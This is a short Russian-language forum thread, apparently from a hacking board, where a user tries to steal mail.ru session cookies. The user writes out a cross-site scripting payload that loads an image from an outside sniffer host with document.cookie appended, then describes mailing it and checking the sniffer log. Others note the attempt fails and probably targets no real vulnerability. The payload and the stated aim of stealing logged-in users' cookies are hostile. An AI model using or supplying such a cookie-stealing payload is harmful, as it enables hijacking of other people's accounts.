куки

вот где брал http://forum.xakep.ru/m_1224792/mpage_28/key_/tm.htm

 

куки будут вороваться только тогда, когда человек который смотрит страницу залогинен.

 

так оно и есть

 

я прочитаю, и на своем мыле проверяю. чтобы все понять

 

и никто не знает...

 

Если бы ты нормально излагал свои мысли, тебе бы помогли. Опиши свои действия по порядку с самого начала, если не хочешь светить ссылку на ресурс.

 

Я создаю файл с таким содержанием <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script> отправляю, захожу за другое мыло, там открываю этот файл, потом обновляю лог сниффа. и мне пришло то что написано в первом посте.

 

да че такое теперь Query: empty. Ппц ну что такое кто-нибудь знает?

 

да, и картинка не высвечивается((

 

Скорее всего это вообще не уязвимость. И ты открыл этот файл вне контекста mail.ru. Об этом говорит и реферер пустой. Остынь. Попробуй рассмотреть сайты попроще.

 

се равно куки не приходят, ток ip